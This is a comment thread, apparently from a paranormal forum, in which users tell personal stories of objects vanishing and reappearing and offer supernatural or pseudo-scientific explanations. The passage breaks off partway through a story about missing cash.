I’m glad I found this site, it’s making me feel a lot better about what has happened to me.

Recently, a bunch of weird little things have been going on in our house. It has also been a time of high tension, and sadness. Here’s the backstory: four days ago, I found out a neighbor’s son died from an overdose of heroin in his bedroom a few days earlier. We only moved here 2 years ago and I didn’t really know him, but my bedroom window faces his backyard and I’d always hear him and his friends laughing in their gazebo ’til late at night because I always sleep with the window open. We neighbors were all aware he had either an active or latent drug problem; this is a really nice neighborhood and so his activities kind of “stuck out.” In any case, I found a little photo montage video his friends made online and it all became a little too personal for me: I saw our house in their photos, and their son doing things my daughter does now: Halloween at school (the same school she’s now at) varsity football at the HS she’ll go to someday, first communion which all her friends just went through on this very weekend. As I stand outside with my daughter jumping on her trampoline, I can’t help but be forced to look right into their kitchen and think about him, as there is no barrier between our yard and their house except a low fence. As I drove by their driveway, I saw his bed mattress on top of a dumpster of his stuff and had to pull over, I was so sick about it. So sad. On the same day, I found out our beloved cat is terminal. We are heading out of town for my niece’s graduation, and are trying to figure out how to handle the situation and how to lessen the blow to my 7 year old. Then later that same day I found out my daughter’s second-best friend is moving far away in a month due to her mom’s promotion. I’m sure by now you can guess the mood and the weight I’ve been carrying around for the last few days.

The next day, Friday the 6th, our town had a late shopping night that happens once a month. My daughter, husband and I had gone out to eat and afterwards were strolling around the shops. Unknown to me, my daughter took $10 of her own money and popped into her favorite little shop while we were talking to friends on the sidewalk, and bought me a ring for mother’s day. I thought she was buying a change purse she had really wanted but she alone came up with the idea that she wanted me to have the ring instead. Still weighed down by all this other stuff, you can imagine I was pretty emotional when I opened the box (she made me open it that night). I put that ring on my finger and didn’t take it off even when I went to bed.

Sometime in the night, the ring was pinching me a bit, and I took it off. I remember this clearly, I set it on my iphone next to the bed and then thought “But if I check the time in the middle of the night it’ll fall off onto the floor so I’ll put it next to the phone.” And I did move it. I can see me moving it in the half-light. Next morning, poof, it wasn’t there. We were late for a Color Run race so I didn’t look for the ring — I wouldn’t have worn it to that anyway — and looked for it when I got back. No one had been in the room in the interim, but there was no ring on the floor. I used a high-powered flashlight, my husband helped me move the table, no ring. Tore apart the bed, pulled dirty clothes out of the hamper (why I am not sure). It is just nowhere.

As I walk around the house, I have been keeping an eye out, and I find I’m looking in places I know it can’t logically be. I’m wondering if I sleepwalked it somewhere else (as far as I know I don’t sleepwalk) or moved it on purpose again in the night and then forgot about it. At one point I started convincing myself I really did move it again; I don’t think so but anything’s possible. I dreamt about it the whole night after this happened but if there were clues there, I don’t remember them.

I do lose things quite a bit, and I have to say I’ve never been so alarmed and blatantly confused about anything else I’ve misplaced. At first I was freaked out it was an omen, which I guess is expected with all the sad stuff I’ve been through in the last few days but now I can’t help but feel like the ring and all the sad stuff is linked somehow. Is this a simple connection between the dead boy, whom I’ve been thinking about non-stop, and a mother’s day gesture? I don’t know, and I don’t even think it makes much sense, and yet that’s what I feel. After coming online and reading these stories, I am beginning to suspect there is even more to it. For one, I went out to the driveway to take my daughter to school Friday morning and the car door was flung open. It had just sprinkled a few minutes before yet the inside was totally dry, and the interior light was still lit and battery still worked — hence I didn’t “leave it open” absentmindedly the night before and I definitely hadn’t been out to the car before we went to leave. Last night, we put our daughter to bed and went to the basement to watch TV. When we came up about 11 pm, we both saw the front door was propped open with a shoe and we both KNOW we didn’t do it. (My husband’s very practical by the way, even going so far as to make fun of me by way of saying the Chupacabra came and left the door open — he definitely doesn’t believe in anything paranormal. But he still checked the whole house for anything amiss.)

Finally, I must say that after reading others’ experiences I remembered that on the night we moved in, I lost my car keys and FOB in the house and never found them. They just totally vanished and there wasn’t even really anything to lose them under or in, because all we had was us and a blowup bed that night! At the time I thought of the man who had owned the house (he died of a really rare cancer although not in the house) but at that point I still wasn’t freaked enough to look up other instances online.

Now I’m going to go upstairs and ask my ring be returned. Hopefully who-whatever has it will listen, and at least I was able to get this all off my chest.

I’ve been noticing things have been disappearing randomly and I look every where around my house for them . It started 2 weeks ago I lost my school folder it was a Friday night and I leave it on the floor under my dresser by my book bag so when Monday comes It wouldn’t take me long to get my back pack put together for school cuz I’m always late . But that morning I was putting my books away and it wasn’t there and I remember that it stayed there all weekend but I never touched it . Next thing is my bobby pins I was putting my hair up all nice for school and I had some fly aways so I went to go get my bobby pins in my hair drawer and they weren’t there and the day before is when I first got them and I put them right in my bun and left them there . Continuing on .. Last night I came home with my glasses that I wear everyday and I can’t really see far away without them and I remember putting my hair up then looking around for my glasses and not seeing them and I had panicked for a moment and I look all over my room and I couldn’t find them and the weird thing is I don’t remember where I put them as soon as I got home and that all is a blur to me . Today as soon as I got home I look everywhere I found myself looking in wear spots too like the garbage can , the fridge , just weird places u wouldn’t think things would end up and I couldn’t find my glasses so I took a break .I usually touch up my makeup when I come home from school sometimes so I went to do that and I wear fake eyelashes so I have a tweaser , I went to the bathroom will my makeup no thinking to look for the teaser and I thought I had it but when I went to the bathroom i didn’t have it and on my way to the bathroom I didn’t drop ANYTHING so it wouldn’t of fallen out of my hands . And I remember using it this morning but I put it back where I usually do . I was getting frustrated and confused so I thought maybe it had something to do with paranormal stuff . I hear things like this happening all the time hopefully I find all this stuff that randomly disappear but I just wanna know why this stuff happens! .

For the last few weeks, I have been feeling like I am not alone. This has often happened to me through my life, My mother died when I was 2 and I often thought it may be her. But this was a very deep feeling. I felt like i was being watched everywhere I went, especially upstairs. About 6 days ago, in one of our upstairs bedrooms, the feeling got too much for me to ignore. I asked for a sign if they needed help, if there was anything I could do – If the person was really there, I wanted them to prove it. I kept saying, just show me a sign. I repeatedly asked for them to move something – anything.

The next day I went out to get some shopping, came home and dumped everything including my keys in that same upstairs bedroom. I clearly remember dumping my keys with everything else. A few hours later, I needed to leave the house again and I couldn’t find my keys anywhere. I looked everywhere, turning everything upside down. Still nothing. We searched the entire house. But nothing.

Finally today after having enough of having my boyfriend drive me everywhere, I phoned for a lock smith.

The Lock Smith arrived and I went to our downstairs bedroom to grab the money to pay him. The cash was in my boyfriends wallet which was sitting on our stereo on our dresser. On top of the wallet were my boyfriends keys. As i went to grab the wallet, I accidentally knocked his keys off and they fell underneath the dresser. As they fell i had an odd feeling. I went to pay the Lock Smith and went straight back to the dresser and looked underneath. There they were, my keys. Both sets of keys just sitting there.

Is this literally just me or is this a little odd? I have been getting such weird feelings here. Within the last few weeks we have heard strange banging noises upstairs while we were downstairs in our bedroom watching TV. Everytime we stopped the TV, the banging noises stopped. All of a sudden we heard this huge bang like something had dropped. We honestly thought there must have been someone in the house. My boyfriend walked around the house and there was no one and nothing had moved. My boyfriend is a skeptic but this even sacred him. We have also heard this odd ticking noise beside my bed – It was very consistent and I don’t like clocks so I don’t have one. The next day when i had asked for that sign from the upstairs bedroom, I had heard that same ticking. That night I dream’t about a lady standing at the bottom of my bed. I am very good at remembering dreams but this one was so fuzzy and I can barely remember any detail other than that she needed my help for something and her name was Barbara.
The next night while I was drifting of to sleep, I heard a sort of moan from a woman, right beside me. There was an odd smell I hadn’t heard before. I was so scared.

Is something going on? I feel like there has to be. Surely I am not just imagining things, am I?

I don’t know. If someone is here though, I would like to be able to help them. Any ideas?

I have experienced something similar last year. I would be awakened in the late hours of the night (anytime between 1 to 4 by a large bang. It sounded like someone was dropping a heavy barbell, it would go “crash” and then sound as though it was bouncing a couple of times after hitting the floor. I am somewhat of a gym rat so I was familiar with the sound. Some people suggested that it was a rodent in the wall – if so it was the heaviest rodent in history. My boyfriend at the time thought I was exaggerating until the day he was over and heard it from the living room (occasionally it happened during the day.) He jumped about a foot off the sofa and said “what in the world was that?” He thought it sounded like someone had dropped a bowling ball.

This went on for about three weeks to a month. We tied to set up a recording activated by sound but it wouldn’t record. Finally, on the advise of my sister, I hung a crucifix on the wall and it went away, Not into crucifixes myself, but what for some reason it seemed to work.

I have also had objects disappear.

It’s a bitter sweet relief to know others are experiencing this DOP. Personally it’s been happening to me quite often the past 5 years. Most recent was an incident today which I will get into after mentioning that my brother has also experienced the disappearing knife. He is a machinest and made a knife from a solid piece of metal in a machine shop. That was his favorite pairing knife and he knows exactly where it is kept in the kitchen. One day It just wasn’t in it’s proper place (and believe me he is truly anal about things being in their place). It’s one of the DOPs that never returned! There seem to be 2 categories. Things that return and things that don’t return. I have experienced both and so have others in the family. The incident that occurred today reminded me of the frame of mind you were in when your knife disappeared. I had a Large Ice coffee that I purchased from McDonalds sitting right next to my hand in the center console of my car. I would continuously take sips as I drove my girlfriend to her house. She had a small ice coffee sitting next to mine. When I dropped her off she grabbed her coffee (wouldn’t dare touch mine as I would have said something). She had her coffee in one hand and a plastic bag in the other. I asked her to get my mailbox keys which she has been keeping since I’ve been out of town. She is really big on details and somehow knows where everything is at all times. Since her hands were full she placed her coffee down on her back porch along with the plastic bag of stuff. She walked to her car, grabbed my keys out of her glove compartment.. walked over to me, handed me the keys. I said,”thanks!”. She picked up her stuff.. and started walking into the house. At this moment I started to drive away. I’m almost certain I took a sip of my large ice coffee as I drove away. I remember thinking,”it’s so weird that I’m sipping this coffee an I’m really not even thirsty… Well, I continued to drive back to my house. A few blocks away I noticed “oh shit.. my coffee is not in the center console It must have spilled onto the floor as I cornered!! .. ughhhh.. this is going to be messy.. ” I felt around on the floor but it wasn’t there!.. and it wasn’t there next to my hand in the console!… I wanted more sips of coffee so Where the F#$ is it??? I was absolutely clueless how it could vanish!!! As I’m driving and feeling around the carpet.. gf calls and says,”hey did you lose your coffee”? I laughed and said “yeah”… Here comes the real mind blower. She saw my coffee sitting on her kitchen counter right as she entered the house! She thought someone else in her house ordered a coffee (not realizing or even fathoming that it could be mine since that would be impossible). So she ignored it and figured it was her mom’s or her brother’s, etc.. Her mom walks up to her and says “hey you got an extra coffee for me? but you know I don’t like coffee, esp. the one McD makes” to which she replied “uhhhhh, I thought someone here bought that coffee because it’s not mine. After asking everyone in the house if that was their coffee, they all emphatically said “no!” So she called me and when I replied “yes my coffee is missing” she thought I was joking.. but no i was not joking.. my coffee was not in the car! She ended up checking the order number which is stamped onto a sticker on the side of the coffee and her coffee matched mine so we know it was from the same order at McDonalds. Long story short, somewhere in the moment after I took a sip then turning a corner in my car. It moved from my car to her kitchen counter! It really has us pretty freaked out but after things like this reoccurring often we are starting to write it down and keep a log. It seems to happen with small hand held objects. Things like keys, pens, cups, knives, etc.

So far nothing bigger than a large coffee has gone through the worm hole. I’ve had a $300 favorite pair of Oakley sunglasses go missing forever.. a large roll of packing tape go missing for a few hours then boom reappear right in the center of the floor of a room that I was using it in. I almost tripped over it but couldn’t find it to save my life hours earlier. Girlfriend’s keys went missing for a few days then ended up being found up against a wall on the floor in an area she hadn’t physically been and she always leaves her keys on a table by the front door. My mom is uber clean and organized. She left her keys on a table after getting home from the store and those are gone forever. My brother is uber organized and really has zero clutter in his house. He doesn’t even have a lot of things. He’s the opposite of a hoarder – a minimalist. He lives in a small house an knows where everything is. He keeps a bag of spare plumbing pvc pipes in a bag in the rafters in his garage. He needed a piece of pipe one day so he reached up to the spot where he left the bag and there is no bag! He looked around for awhile.. nowhere to be found. He ended up going to home depot to buy the piece he needed. About 1 week later on a whim he went back to look for the bag of misc. pipes an there it was!! Like some sort of joke! I could go on and on with stories like this. Things happening that simply defy the laws of physics and reality as we know it. Now that I know it’s a pretty common thing I think it’s time we dig deeper into this. Maybe there is some common denominator that we are missing.
Do humans have the power to make objects appear and disappear? or possibly just alter the perceptions of those around us? My mind is continually being blown by the stories of others. My aunt is also very organized and meticulous about things she owns. Her extremely valuable pearl necklace went missing when she was packing to go back home. She knew exactly where she left it in a pocket inside her suitcase. She looked there over and over.. 5 times!.. It just wasn’t there. She thought “oh the heck with it…” and closed up the suitcase, through it into the trunk of the car. She went back into the house.. searched around some more and found nothing. She continued packing other bags etc.. and after everything was in the car she decided to take one last look.. She opened the suitcase and again like some twisted joke the necklace was right ON TOP of the clothes!! We should consider making a documentary. Really fascinating stuff. I now have 7 cameras around my house that pick up any sort of movement but like the quantum “double slit” experiment the fact I have cameras rolling will probably somehow affect the outcome. Which is fine by me.

I am so glad I found this website. I don’t have a DOP story but this is the closest I can find somewhat related to my experience. A few months ago the wrist strap on my compact umbrella came off. I remember assessing the situation and realized I couldn’t fix it. It’s not like a loose screw or anything. It was irreparable. I thres the strap away. I was quite annoyed and thought I should have bought a backup because it was on sale and a nice looking umbrella is difficult to find if you are picky like me.

It had been raining the past while so for last 2 to 3 weeks I periodically take the umbrella down from the shelf in the coat closet and put in my work bag. It bugs me every time to see there is no strap and I remind myself to start hunting for a replacement.

Couple days ago, there was a bout of flash rain so I was using the umbrella. It is really annoying when I get on the bus and can’t hang it off my wrist (with the strap being gone) and it is too wet to put in my bag. I hate putting things on the dirty floor. I gently placed it on metal between two seats. Not having a wrist strap was really bugging me. Second part of my commute was on a city ferry. Same experience.

When I finally got home I opened the umbrella and put it in the bathtub to dry. A few hours later I went to collapse and put it away. The freaking WRIST STRAP is ON IT!!! I couldn’t believe it. I tried to see if there was any way it could have been hidden or whatever. It is impossible. the thing sticks out the side and away from the rest of the umbrella fabric. I examined where it is attached. It surely is designed so it is not possible to come loose (as in screwed on). You have to break it to lose it.

Well I guess I don’t have to hunt for a new umbrella now but this is Really weird.

Wow! Glad I am not going mad. 100% believer.Took out some freezer bags yesterday to freeze some lamb. Today both packets of bags are gone. Place is quite small, looked everywhere, even in the stove, bin, microwave, freezer and fridge. Behind and underneath everything. Just gone. And yes, they still may reappear. Told my mom about it. She reminded me of hair clippers I once bought. I was still living at home. Bought these clippers. My mom witnessed that I brought them into the house. Wanted to use them that same or the the next day, can not remember. Did not take it out of the packaging yet, but when I wanted to use them, just gone. Never to show up again, and that is more than 10 years ago.

  25. Avatar Julian Bates says:

    Yes.
It is… Something that almost-always occurs when I am intent on getting off & leaving the house quite quickly.
When I used to have to leave for work, objects on my bed seemed to disappear when I needed them, and reappeared… It felt like .. some spirit, and ‘it’ had my forgiveness when it appeared again; – there was a real feeling of Release and relaxation – rather than anger. And – because I was in-a-rush, I thought that it was my state-of-mind (and I do think that has something to do with it, but something else is ‘doing’ it), but deep-dowwn, I kind of knew it wasn’t me.
However, today was the only time that it was as clear as crystal: I needed to take my camera as I was getting ready to go out, and I couldn’t find the case; I was sure I had left it on the sofa, but it was not there! I even entertained that it was this phenomenon again, but I don’t like to dwell on it, so I didn’t. Then 2 minutes later, THERE IT WAS, as innocent and simple as it had always been.
So I KNOW it is not me, nor, actually, my fault… Shamans say we all have interference from trickster-beings, but I don’t know. I have many crazy phenomena, where time just DISAPPEARS (e.g. 30 minutes have apparently passed in 5-10 minutes), and more extreme things that have been quite humiliating (being late, or in a dangerous rush to work, was not funny – and I was blamed, naturally, but I couldn’t tell them the truth.
I need to rid this absurd, quite abusive phenomenon from my life!
I am angry about it. I think it is an outrage, but I don’t ‘get’ angry…
I think most of my friends would not believe that it is not my own self’s incompetence!

My mum’s wedding rings are a pair. The plain gold band and the diamond ring. She usually keeps them on her dresser. One day the diamond ring disappeared. We searched the whole house, she even retraced her steps back to church but didn’t find it. So for weeks she wore just the plain band. It was such a puzzle as the rings are both tight and do not fall off.

One evening, she came back from church, and pulling off the band she murmured that whenever whoever took the diamond ring was tired of it, they would return it. She said this in her room where I was with her. I left her, to go outside and the diamond ring was on the foot mat outside the front door. Right there in plain view.

Last week, my fiance was in his project room at home on his day off from work. He dropped a small plastic container from his dresser. The contents of the container spilled into the floor along with the lid. He waited to hear the sound of the plastic bottle hitting the hardwood floor, but heard nothing. Confused, he began searching the entire room, including dresser drawers, imagining it had somehow fallen into a slightly-opened one. High and low, it was nowhere to be found, only the lid and what had spilled out. When I got home that evening, he explained the scenario. Perplexed, I began searching as well, even in the other rooms of the house in case the cylindrical container had sneakily rolled across the hall and into unfamiliar territory. My efforts were proven fruitless. We are both oddly stricken by these events. There have been other occasions when we could not explain happenings. At times, our DVD player replays parts of movies, but seemingly only in a certain area of the house. Other things have gone missing as well, but I can’t easily recall what the circumstances or objects were. There is something about this that chills me. It just doesn’t “feel” right. I’m not even sure if I think it is supernatural, and I am a believer in the existence of ghosts. I am simply very confused.

Don’t worry for whatever reason this DOP only seems to happen with small objects. Haven’t yet read any stories of people or objects larger than a laptop disappear. Personally I think it has something to do with quantum physics. The outcomes of some experiments will actually change based on someone observing them! Other experiments show molecules that are connected and communicating even though they’re miles apart. It just proves we have a lot to learn.

This is really interesting because I have had a similar experience recently and it’s good to know it has happened to others as well.
I have a very special book that I have had since a child. I used to put valuable things amongst the pages and never moved/touched the book. It stayed constantly on my bedside table and never moved, I never touched it, took it anywhere, read it or covered it with anything. No one in my family had registered that I kept it there so they are not involved. One night I was reading a similar story, and thinking very deeply about issues relating to that particular book. It was late so eventually I decided to sleep. So as I turned out my light I suddenly noticed a massive gap on my bedside table where my book always sat. I had definitely seen it there before I sat down, but now it was suddenly missing. I interrogated my entire family and tore my house apart looking for it, but I still have no idea where it went. It held a lot of sentimental value towards it and I would really like to find it. It’s great that this seems to be common.

  33. Avatar Li says:

I didn’t stumble on this website, I searched the net to try and find out if what happened to me had happened to others. So I’m relieved to have found this forum and discovered that indeed that this is the case and others have had similar experiences.

Throughout my adult life I have had a few strange experiences, for example premonitions of something, which have then transpired; sometimes only seconds after I mention it or things moving or falling dramatically. But the one that left me most startled of all happened around 1 year ago. Luckily I have 2 witnesses to what happened for my own reassurance or by now I could have put it all down to nothing more than a dream!

One night as I was getting ready to go to bed I went to put the alarm on as I do every night. I’m the one that always sets the alarm for my husband to go to work and my daughter to go to school. On that particular night the alarm clock (which is some 15 cm long by 8cm wide) wasn’t where I always have it, on the bedside table beside my bed. So I looked around and eventually got my husband and daughter to help me find it. Oddly it was nowhere to be seen. Needless to say we searched high and low in the room, I even remember looking under my laptop that was lying on the ground beside the bed.

I’m the only one that sets that alarm as it is quite tricky – it is radio controlled and it has far too many buttons. We really needed to make sure we got up in the morning, so as my alarm was missing, we decided to set a battery operated alarm clock that it is in the shower room (to help us keep an eye on the time while showering).

So we went to sleep and I just put it out of my mind, thinking, it would appear at some point in the future. However, in the middle of the night (around 3 am in the morning) I got up to visit the toilet and when I returned to the bedroom the alarm clock was perfectly placed on the floor beside the bed on top of my laptop (perfectly aligned with the side of the laptop)! I immediately thought that my husband must have gotten up before me, found the clock and put it there. In the morning when we got up I asked my husband and he said he never moved from his bed, so we went to ask our daughter and she knew nothing about it either.

I remember we 3 sitting on the bed looking at each other with startled eyes! I have to say I was quite shocked for a day or two, as this is so difficult to reconcile with our scientific mentality.

But after reading the comments on this forum, I am relieved to find that this is not an uncommon phenomena and having confirmation of instances when this has happened to other people is a good starting point.

I’ve read through the original post, and quite a few of these replies, though I haven’t read all of them at this point. I randomly Google searched tonight for objects disappearing in parallel universes, and it brought me here.

I’ve experienced DOP for probably 6 years that I’m aware of. At first it’s just like everything else. You lose something, you look for it, you get over it, and buy another to replace the previous item.

I’ve noticed a lot of these stories are regarding items of value; rings, electronics, even legal documents. These could possibly be explained in more mundane ways, but it’s still unusual. I’ve never lost anything of value more than a few dollars, which leads me to believe these items have just disappeared into “nowhere”. This includes socks (everyone has lost these), measuring cups, knives, cutting boards, etc. It’s strange because I see more kitchen wares disappear than anything else.

I’m an extremely skeptical person. I’m an atheist who is extremely grounded in science. I don’t believe in God, ghosts, most paranormal stuff, and even the existence of a soul is something I can’t lend credence to. But when things started disappearing I put my rational, logical brain to the side for a moment, and came up with what I postulate here.

I first formulated my ideas about what happens around 6 years ago, and the only way I can explain it is that there are “inter-dimensional beings” that come into our existence, take things randomly, and most times never bring them back. I have had items inexplicably returned, but most of what I’ve noticed missing, has never been seen again. I’m not sure if these items don’t exist in the other “realm” but it’s a thought.

One of the returned items was a pair of boning shears that were suddenly replaced in the new household we moved to after we were well established, and long after unpacking had been completed. Many months after they’d disappeared. I inquired with my family, and no one had a clue about how the shears reappeared, in the knife block where they used to be. Which leads me to believe that space/time doesn’t affect the “inter-dimensional beings”, at least in as much as locating us in our dimension.

There are multiple explanations for disappearing items in any household, including mine. I have two children, so a certain amount of “shrinkage” is normal. But most of the times that things have gone missing, no one else is around. And again, these items are never seen again. Even after moving to a new residence, etc. Nowhere.

I’ve never had an object disappear in the 30 seconds that the original author described, at least not to my knowledge, but I firmly believe it happened based on my own experiences.

If there is another “realm”, I also feel that this could explain ghosts and spirits. I think anytime someone sees a ghost, it’s likely “an inter-dimensional being” sort of seeping into our dimension/universe. I can’t explain why we can’t physically interact with this realm on a regular basis, and why we can’t take any of their items, but I’m sure it has something to do with physics.

Anyhow, I’m sure this post is long enough, and sounds just crazy enough to be dismissed. It’s a running joke in my family that the “inter-dimensional people took it”.

I’m really glad that Tob Williams posted this. I thought I was the only one with a ridiculous theory on disappearances. On a different note, this could explain disappearances in the various “Triangles” around the world as well.

In 1986 I was in my bathroom preparing to apply my makeup. I had a small container of Mary Kay white concealer with a screw on top (about 3-1/2 inches). As I unscrewed it, the lid fell on the floor. I bent down to pick it up and it was gone. Not more than 3 seconds could have passed. I do not recall after this many years if I heard it hit the floor. I looked everywhere; why though, where could it have rolled to in 3 seconds? I even stuck my hand down into the toilet. I searched but had to stop or I would be late for work. IT DISAPPEARED right then, right there! There is no explanation. It was never found. Thirty years later I am still haunted by this. It vanished into thin air. I am not crazy.

I found this interesting because it was consistent and in the same room.

  39. Avatar Aleesia says:

I am so glad I decided not to give up on my puzzlement and dig a little deeper into this strange occurrence that I just cannot explain. Thank you for this blog/forum and to all those who have shared their DOP story and experiences
To give a bit of a back story, I’m in my late 20’s going through a transition period of shedding all things that no longer serve me as i enter the official world of being an adult. I have been an adult for a while but now I am at the stage where I am now putting my future in place and starting my own business. (A little bit of a lead up but I want to talk about it as it may have some significance to what you call DOP). During the period of transition, I started a relationship with an old school friend and during the course of our 2-year relationship I got to know his father very well. I didn’t grow up with my dad and as my boyfriend’s father knew him well it felt at times as though he was becoming a father figure to me, he wasn’t a well man but we would hang out occasionally and had built up a bond together. On March 26th 2016 I went to visit him to bring him some food and to keep his company for a little while but didn’t stay as long as I thought I would have as my partner called me and wanted me to drop him somewhere so checked his father was ok and had everything he needed and i left. (Please bare with me as I need to get this off my chest plus include everything that happened leading up to my DOP experience) A few days had past and on Monday 28th of March 2016 I had a friend coming to London to visit. Her brother had an important surgery and she wanted to be there to support him. The plan was for me to have her kids as so she had the freedom to do so. She arrived in the evening and settled the kids in at my home. I’m a big kid at heart so we got straight to playing games and all the fun things kids like to do. The following day Tuesday 29th the kids want to go to the park we all get ready and go. As I mentioned before I am in the process of starting my own business. I had brought 2 new LG smart phones one as my new personal phone and one as my business phone. As I am not the best at keeping my phones charged I always had both on me in case on died or if I may receive a business call on the go while I’m out. At the park my personal phone battery is low so I sent a message to my sister and my friend both who’s kids I was looking after to let them know not to contact me on my personal phone as the battery was low and only to call me on my business number and so they did. We stayed in the park roughly 20 minutes after that then headed to the corner shop for refreshments before going back to my house for dinner. All within 0.5miles from my home. At various times during the last 20 minutes at the park and the walk to my home my sister had called me on my business phone to say where she was as she would be meeting us to have dinner together at my house. We get back to my home and I get the kids to wash their hands and sit at the table for refreshments before dinner as we wait for my sister to arrive. I put my personal phone on the desk to charge and had my business phone with me on the bed where I was sitting also charging. A get a call on my business phone from my sister saying she’s close by and we’ll see her soon. When my sister arrives we all dig in to our dinner. The kids on the dinner table and me and my sister on my bed. (It’s a studio flat) As far as I remember the business phone was with my charging on the bed and had my other phone with me also. We all finish are dinner and the kids want to play with my instruments as they had done the day before. Me and my sister slip into the kitchen to have some adult talk whilst the kids amuse themselves. I’m not 100% sure but I think it was a full moon that night and I remember talking to my sister about things that I am passionate to achieve in my life and was quite emotional as I was talking and tears my rolling down my face constantly and was have gazing at the moon as I was talking to my sister about my passions etc. We could have been chatting in there for almost an hour and I was sure both my phones were in there with me but can’t be certain. As when you have guests over sometimes your mind goes elsewhere and your normal routine at home can go out the window. So I wasn’t really focused on it as from my knowledge both phones where at home with me. Somewhere? The night continued on and as the kids were on holiday and enjoying themselves I let them stay up late to play together and we were having such a great time. As it was getting late my sister decided it was time to go home and ordered her Uber. I then too started to get the kids ready for bed just as my boyfriend came in. Kids were now in bed so I spent a little time chilling with my boyfriend before we also went to bed. My boyfriend left the next day to go to work while I waited with the kids for their mum to pick them up now Wednesday 30th of March 2016. Still hadn’t seen my business phone but had assumed it was down the side of the bed or something as I hadn’t left the house since we got home from the park. So my phone should still be in the house right? My friend arrives and we sit and talk for a little while before she rounds up the kids to leave. Still no sign of my phone but still think as I’ve had company and my routine was changed that it’s in the house somewhere and that I’d find it when I have a tidy and proper look around. I had a potential client (my boyfriend’s sister) coming over for a meeting so didn’t get the time to look and quickly moved on to the next mission of the day. The meeting came and went and then called my boyfriend to tell him how it went using my personal phone. He said he was close by and would see me soon. As I had had a long couple of days I was knackered and not long after my boyfriend had arrived we found ourselves fast asleep until the next morning. Thursday 31st of march. I woke suddenly to my boyfriend in a bit of a panic as he starts to get dressed whilst passing up and down saying he can’t get through to his dad’s phone and that he was getting ready to go and see if he was ok. I’m not sure if he was hinting that I come with him but he wasn’t being clear about it. (I hate when he does that so I tend to ignore it unless he is more direct with me) but something inside me said to offer. So I did and we booked the zipcar and drove to his dad place. Once we had arrived my boyfriend went in whilst I waited in the car. He could hear his dad’s phone ring from outside but no answer at the door. So he calls the landlord to see if she knows of his whereabouts. The landlord gives the most shocking news possible that his father had passed away and I could see that broke him as he walks towards me and he informs me and we cry together. I could not believe it and still to this day am a little hurt and upset. He was my friend and like a dad to me and although he was not my biological father he accepted me as though he was. The landlord then informed us that his dad passed away on Tuesday 29th roughly about 5pm. Now, the last time I saw my business phone was Tuesday night. Days later I found out about android device manager and that it is possible locate and call your phone that way if lost. I quickly tried this method but as the phone was off it was unable to give me the direct location or be able to ring it. But what it did tell me was that it was last synced on the 29th march 2016 at 17:29 and according to my sisters call log and my friends they had both called me whist I was at home on my business phone. Now months later I am still wondering what happened to my phone. Right at the time when I’m trying to start my life up again and my new business. The other day I was out with my boyfriend and his friend in his car and saw a phone battery that looked like mine, his car is not the tidiest and it did make me wonder if somehow I left my phone in his car and it got lost amongst all his things. I’ve made his friend aware of this today so will wait and see the outcome, although if it does turn up there that would be very strange! Very very strange! Thank you for bearing with me through my looong story. But I had to share it with people who have gone through similar situations and may be able to understand that had occurred. I’ll look into quantum physics and the other possible rationales mentioned above, but now that I have found this forum of so many people who have gone through all very similar experiences and also my sister who I’ve just spoken to on the phone about it too. I’ve now come to a firm conclusion that life surely is not just what we see or told about in school and society. I’m sure there are more realities that we cannot see or are aware or conscious of and that all the things my mum, my gran or that I witness at times are not my imagination playing tricks on me and that maybe I’m being made aware of these different realities or Simultaneous universes that may be existing at the Same time that we are not aware of. My mum gave me a book ages ago that I never took the time to read. “The education of oversoul 7” a novel by Jane Roberts. After all of this I’ve taken the book out and plan to make it my new read. Thank you again for staying with my though my story. Please if you have any comments or helpful information about it or have read the book above I would be grateful to hear any feedback.

I think we all have common experiences of things disappearing and trying to find explanations and then just forgetting because we can’t understand. But this week, I had a most unique experience I never want to forget. I have just moved house and I’m emptying and going through boxes, putting stuff away. I was hanging my clothes from my large red suitcases when I realised that clothes were missing and the missing clothes were located in my large lilac suitcase. But I hadn’t seen it? I searched the house for the lilac suitcase. It is large and couldn’t be missed. Yes there was boxes still in rooms but I moved stuff to find it and it was clearly not in the house.

So I panicked a bit and phoned the people who moved me. They reported never seeing the lilac case, only red cases. An explanation was that the case had been left in my old flat and because I still had keys I checked and it wasn’t there. I was increasingly anxious by this time. Another explanation was that a friend who was helping with the move must have left it in his van? The van was at his work place and since it was the weekend, I had to wait for Monday for him to check. I never knew if he remembered the case because he received my msg indirectly. I just concluded he must have it since the moving team assured me there was no way my case could have been left in pavement. It worries me that they did not remember it.

So Mknday morning I am waiting to hear from the friend to check the van. I am sitting on the floor by the wardrobe putting a few things away and thinking about my lilac case. I was trying to imagine the contents. I pictured a couple of jackets. I felt perplexed that I may never see it again yet prepared to lose it because it’s only material things after all.

Behind me was a couple of large boxes on floor in front of bedroom window. As I was lost in thought, I suddenly was aware of a noise behind me as though if a lie rumbling a wind noise which became louder and glass ornaments fell to the floor beside me. I was momentary frightened/concerned that something was trying to get through the window behind me. This must have happened in seconds but seemed slowed in time as I replay it now. I turned nervously to look behind me and there between the wardrobe and boxes by the window was my lilac suitcase. Literally wedged neatly into the space.

I stood up and could not believe what I was seeing. I said Thank you out loud. Where had it been and his was it transported back to me. I then tried to rationalise in my mind that it was there all along but hadn’t seen it. But then I discounted that because I heard the noise – I heard the case arrive!!!!

  41. Avatar Susan says:

Just retread my comment. Apologies for typos. I’m sending this via phone. To clarify – the noise behind me seemed like a low rumbling at first then louder like a rushing, flapping wind noise as I wondered for a second if it was birds trying to get through the gap in the window. It’s a sash window which was a few inches open.

I never heard if the case had been in the van because it was a work colleague. I don’t have his number and his boss had contacted him. Once I alerted everyone that the case had turned up, the subject was dropped. Rather than try to explain my strange experience, I just said it was in the house hidden behind boxes and this was easily accepted although they maybe thought I was an idiot for panicking when I hadn’t looked properly.

In fact, I had searched every inch of the house. The lilac case was never in the house. I return to work tomorrow and I intend to ask colleague with van if he Had the case but it wouldn’t surprise me if he can’t remember it.

There are mysteries yet in this high tech world where we think we know everything.

I am glad to have found this site. My friend had some money disappear which cannot be explained. Has anyone had similar? As its money it always makes people think of theft, but all possibilities of theft have been ruled out. Here’s what happened.

My friend counted out a specific sum of money she needed to pay into her account to pay her rent. She tells me she counted this 4 times to be exactly £1200. She did this alone in her bedroom with the door closed. Her son, the only other person in the house was in bed. She put the money into an envelope and then into her bag. She then left her house and got into her car. She put the handbag under seat so no one could see it whilst driving.

She got to her flat where i was staying as an airbnb guest. She left her bag on her coffee table whilst doing some chores. I was getting ready to leave unaware of her bag or its contents. After I left, she walked to the bank to pay in the money. She handed the envelope to the cashier who took out the money in front of her and counted it. There was £360 missing. She made him count it 4 times but still the same total.

